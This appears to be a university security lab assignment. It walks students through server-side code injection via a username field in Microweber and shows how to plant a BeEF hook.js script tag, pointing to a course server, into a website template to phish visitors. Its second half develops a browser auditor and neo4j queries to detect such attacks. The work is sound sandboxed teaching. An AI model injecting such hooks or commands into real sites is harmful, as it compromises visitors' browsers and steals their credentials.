Note: Please make sure you have a GUI-enabled Linux OS (e.g., Ubuntu VM, WSL) to work on this project.

Table of contents
- Disclaimers
- Objectives
- Checklist of Downloaded Project Files
- Tasks
  - Role 1 – Attacker (45%)
    - Task 1.1: Exploit Discovery (15%)
    - Task 1.2: Compromise (30%)
  - Role 2 – Forensics Investigator (55%)
    - Task 2.1: Auditor Tool Development (25%)
    - Task 2.2: Attack Investigation (30%)
- Submission

We are always looking to improve our homework assignments. If you see any errors, whether grammatical or technical, please report them on Ed Discussion. If anything is not clearly stated, please contact the TAs.

With this project, you will come to understand the big picture of how common web attacks happen in the real world by playing the two roles typically involved in an attack:

Role 1 – Attacker (45%)

During reconnaissance, you found the following information.

With these insights, you made a smart plan to mess with Bob and his clients. Without further ado, let's get started!

After you have got the membership, you are permitted to register as an admin to further use the Microweber service.

Note: if you later accidentally crash the services (likely to happen when you test your code injection with an illegal payload), you can always come back to this page and stop and start the services again to get a fresh environment.

(Screenshot: the container control page with the beef and web containers and their status.)
(Screenshot: the Microweber installer's Login Information form for the admin account.)

Task 1.1: Exploit Discovery (15%)

Background

What happens under the hood is that when you log in after registration, before the server delivers your profile page, it first constructs that page by dynamically filling the username field of a profile page template with your username retrieved from the database.

Text placed between two backticks will be treated as a shell command on Linux. (Figure: location of the backtick on the keyboard.)

Combined with those two features, can we do something nasty? The answer is YES! As you have probably figured out, you can set your username to {{`malicious code does something nasty`}} so that your "username" will be parsed and executed as code and do nasty stuff during the profile page construction on the server. A common practice to prevent this type of attack is to sanitize user inputs by turning them into inexecutable strings. However, sanitization is not always correctly implemented. The Microweber website is an example: one of the user input fields lacks proper sanitization and is vulnerable to code injection attacks.

Steps:

(Screenshots: the Microweber 1.3.2 dashboard, Users > Manage your users > Edit user (Step 1, Step 2), and the Edit profile page.)

/var/www/html

/tmp/secret_l.txt on the server, see the example below. Submit this hash string to Q1.1 in the questionnaire. (Note: If you see two identical hashes, just submit one. This may happen because the injected data field is accessed twice during page construction.)

(Screenshot: the profile page reading "You are logged in as" followed by the hash string.)

Task 1.2: Compromise (30%)

Description

The ability to run a command on the web server implies that you may do more on it, including modifying Bob's website. In this task, your goal is to insert a malicious script payload into a template HTML file used by Bob's website. Webpages of Bob's website import the infected template, hence becoming infected as well. In this way, Bob's clients get compromised when visiting his webpages.

characters (e.g., ) in your submission will cause a mismatch and lead to 0 pts during autograding.

- You can use the Linux find command to search for Bob's directory. You can use (root location) or (parent folder) as the search location to help you.
- In the example below, your answer submitted to Q1.2.1 should be clients assets

$ find / -iname client_md5
Result: /xx/xx/clients assets/client_md5

<script src="http://cs6264.gtisc.gatech.edu:YOUR_BEEF_PORT/hook.js"></script>

(Screenshot: the BeEF ui/panel address bar.) Find your BeEF port number here.

Hints:

- Run the Google Phishing attack (BeEF > Social Engineering) and observe what happens to Bob's webpage.

(Screenshot: the fake Google Mail sign-in page shown on Bob's webpage.)

Rubric

Congratulations! At this point, you have successfully deployed and tested the attack.
Now it's time to look at this story from the point of view of another crucial role: the forensics investigator. As a forensics investigator, your job is to find the evidence of any attacks that happened to a victim. To approach this goal, you come up with the following plan:

Task 2.1: Auditor Tool Development (25%)

Description

In the first step, you need to develop a handy tool to log and model the activities happening in the browser. To take the engineering burden away from you, we have implemented most of the auditing tool (you are nevertheless encouraged to go through all the code), so that you can focus on learning the concepts and philosophy of modeling browser activities that we provide in the supplementary document.

Steps:

- You need a Linux system with GUI support (it is highly recommended to use Ubuntu).
- Make sure you have Python3 and Chrome installed.
- Install the required packages: pip3 install --upgrade pip && pip3 install -r requirements.txt
- Run Chrome with the auditor listening on the events: python3 auditor.py
  Make sure you do not have a running Chrome instance when running the auditor. To save you the hassle of repeatedly copying and pasting the URL of Bob's page into the browser GUI during testing, we provide a flag --init-page which automatically opens the URL you specify when the browser starts. The usage is: python3 auditor.py --init-page <URL>
- Then the auditor starts logging the events. If you see a series of three events, 1) request, 2) response, and 3) script parsed, showing up repetitively, it is the heartbeat sent back and forth between the remote hook and the BeEF server.
- Compress the generated logs into a tar.gz file with the name [username]_cs6264_lab.tar.gz and submit it to Gradescope along with the questionnaire. Note: submission in the wrong format will lead to 0 pts.

$ tar -tf username_cs6264_lab.tar.gz
FrameNode.tsv
Frame_compile_Script_Edge.tsv
Frame_request_Resource_Edge.tsv
ResourceNode.tsv
Resource_respond_Frame_Edge.tsv

Having additional log files is fine (they may be generated by your browser extensions, if you have any) as long as the submitted logs contain those from Bob's page.

Rubric

Question   Deliverable                    Credits
Q2.1.1     Completed event_handler.py     15%
Q2.1.2     Logs of Bob's clean page

Task 2.2: Attack Investigation (30%)

Description

Congratulations! You have completed the key component of this project. Now that you can collect the logs, what is left is to connect the pieces of information in the logs to recover the whole picture of what happened during compromised browsing sessions, and to find the evidence of attacks in the constructed causality graph. In this task, you need to execute and record logs for three common types of attacks from BeEF: phishing, fake notification, and browser redirection:

Once you have collected logs containing those attacks, your next step is to construct a causality graph, and then find the evidence of those attacks in the graph through queries.

Note: These three attacks do not have side effects on your browser. To complete this project, we recommend only playing with these three attacks. Other attacks could have an impact on your browser.

For each attack:

(neo4j's query language) to locate this pattern in the graph. Please see the Supplementary Document for the detailed guide.

Based on this logo's URL, construct a query that returns a Frame request Resource subgraph where the resource node's URL points to the Gmail favicon in the causality graph, as shown. Submit your query to Q2.2.1 in the questionnaire. Note that:

(Screenshot: example query response indicating a potential Google Phishing attack; the node details show a Resource node with type "Other" and its url.)

(Screenshot: example query response indicating potential malware downloading; the results overview shows Nodes (2), Relationship (1): download (1).)

www.example.com) as opposed to (e.g., www.example.com/xxx/xxx/).
With this observation, you can further restrict your query by adding a condition: the frame node's security_origin is the same as its url. Note the detail that the security_origin does not have the trailing character at the end. To perform string operations, you can find help from the string functions and scalar functions in Cypher. As shown in the example below, your query should return the pattern Script create Frame where the frame node's security_origin is the same as its url except the last character. Submit your query to Q2.2.3 in the questionnaire.

(Screenshot: example query response indicating potential site redirection; the node details show a Frame node.)

Note:

URL), your other two queries must be generalizable, meaning that they should catch attacks in the real world demonstrating the same behavior patterns (e.g., downloading real malware, redirection to URLs other than the example one). Failing to do so will result in 0 pts for those two queries.

Rubric

Deliverables

Important Note:
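The three Task 2.2 patterns as an added example, not the course's auditor, the supplementary document's schema, or a grading solution: a small in-memory stand-in for the neo4j causality graph with constructed nodes and edges. The labels Frame/Resource/Script, the relationship types request/compile/create/download, the property names url/security_origin/type and the Gmail favicon URL are all assumptions taken from the wording above.

```python
# Added illustration, not the course's auditor or its neo4j schema: a tiny in-memory
# causality graph so the three Task 2.2 patterns can be tried offline. Node labels,
# relationship types and property names are assumed from the assignment text; the
# real names come from the supplementary document. All data below is constructed.

# Placeholder for the page's elided Gmail favicon URL (assumption, not the real value).
GMAIL_FAVICON_URL = "https://mail.example.invalid/favicon.ico"

NODES = {  # node id -> properties (constructed)
    "F1": {"label": "Frame", "url": "http://bob.example/", "security_origin": "http://bob.example"},
    "F2": {"label": "Frame", "url": "http://evil.example/", "security_origin": "http://evil.example"},
    "F3": {"label": "Frame", "url": "http://bob.example/blog/post1", "security_origin": "http://bob.example"},
    "S1": {"label": "Script", "url": "http://beef.example:3000/hook.js"},
    "R1": {"label": "Resource", "url": GMAIL_FAVICON_URL, "type": "Other"},
    "R2": {"label": "Resource", "url": "http://bob.example/style.css", "type": "Stylesheet"},
    "R3": {"label": "Resource", "url": "http://evil.example/update.exe", "type": "Other"},
}
EDGES = [  # (source id, relationship type, target id), in causal order (constructed)
    ("F1", "request", "R1"),   # Bob's frame fetched the Gmail favicon: phishing indicator
    ("F1", "request", "R2"),
    ("F1", "compile", "S1"),   # the BeEF hook was compiled inside Bob's frame
    ("S1", "create", "F2"),    # the script created a frame at another site's root
    ("S1", "create", "F3"),    # ...and an in-site iframe (not a redirection)
    ("F2", "request", "R3"),
    ("R3", "download", "F2"),  # a download relationship, as in the malware example
]

def match(src_label, rel, dst_label, where=lambda s, d: True):
    """Cypher-style MATCH (s:src_label)-[:rel]->(d:dst_label) WHERE where(s, d)."""
    return [(s, rel, d) for s, r, d in EDGES
            if r == rel and NODES[s]["label"] == src_label
            and NODES[d]["label"] == dst_label and where(NODES[s], NODES[d])]

def find_phishing(favicon_url=GMAIL_FAVICON_URL):
    # Q2.2.1 pattern: Frame -request-> Resource whose URL is the Gmail favicon.
    return match("Frame", "request", "Resource", lambda f, r: r["url"] == favicon_url)

def find_downloads():
    # Malware-download pattern: any download relationship, regardless of endpoints.
    return [(s, r, d) for s, r, d in EDGES if r == "download"]

def find_redirections():
    # Q2.2.3 pattern: Script -create-> Frame whose security_origin equals its url minus
    # the last character, i.e. the frame landed on a site root (url = origin + "/").
    # Cypher equivalent under the assumed schema:
    #   MATCH (s:Script)-[:create]->(f:Frame)
    #   WHERE f.security_origin = left(f.url, size(f.url) - 1) RETURN s, f
    return match("Script", "create", "Frame",
                 lambda s, f: f["security_origin"] == f["url"][:-1])
```

Only F2 is reported as a redirection: F3 was also created by the hook script, but its url is a deep path, so the origin-equals-url-minus-one-character condition excludes it, which is exactly what makes the query generalizable.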